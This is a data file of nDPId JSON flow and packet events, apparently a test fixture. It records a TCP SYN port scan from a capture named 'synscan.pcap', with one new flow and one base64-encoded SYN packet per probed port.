+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsvA8AAC4GXmOsEAAIQA2GNIzSBrbdUoMYAAAAAGACDAAl2QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADQGcP2sEAAIQA2GNIzSPoDdUoMYAAAAAGACBAD2DgAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjYAADgGmjysEAAIQA2GNIzSAH3dUoMYAAAAAGACBAA0EgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstNUAACgGa52sEAAIQA2GNIzSBnrdUoMYAAAAAGACBAAuFQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs8U8AACUGMiOsEAAIQA2GNIzSBHzdUoMYAAAAAGACCAAsEwAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZEAACkGseGsEAAIQA2GNIzSAW7dUoMYAAAAAGACCAAvIQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAszmgAADIGSAqsEAAIQA2GNIzSwA3dUoMYAAAAAGACDABsgQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpgAADcGStqsEAAIQA2GNIzSBy\/dUoMYAAAAAGACEAAhYAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxQAADkGxF6sEAAIQA2GNIzSJtfdUoMYAAAAAGACCAAJuAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADoGVqqsEAAIQA2GNIzSCDvdUoMYAAAAAGACDAAkVAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsZw4AADEGsGSsEAAIQA2GNIzSKXndUoMYAAAAAGACCAAHFgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs2AwAACgGSGasEAAIQA2GNIzSCp3dUoMYAAAAAGACBAAp8gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsRBEAAC0G12GsEAAIQA2GNIzSJxPdUoMYAAAAAGACCAAJfAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs8C8AADUGI0OsEAAIQA2GNIzSBBHdUoMYAAAAAGACCAAsfgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsHTEAACwG\/0GsEAAIQA2GNIzSBBLdUoMYAAAAAGACBAAwfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsK1MAADIG6x+sEAAIQA2GNIzSH5LdUoMYAAAAAGACDAAM\/QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsd90AADEGn5WsEAAIQA2GNIzSBI3dUoMYAAAAAGACCAAsAgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KcAACcGQMusEAAIQA2GNIzSFR3dUoMYAAAAAGACEAATcgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs36oAADkGL8isEAAIQA2GNIzSE7vdUoMYAAAAAGACCAAc1AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs554AADQGLNSsEAAIQA2GNIzSCU\/dUoMYAAAAAGACBAArQAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVqIAAC8GwtCsEAAIQA2GNIzSB+bdUoMYAAAAAGACEAAgqQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJQAADMGwN6sEAAIQA2GNIzSGW7dUoMYAAAAAGACEAAPIQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAstzAAADsGVkKsEAAIQA2GNIzSJpTdUoMYAAAAAGACEAAB+wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="} 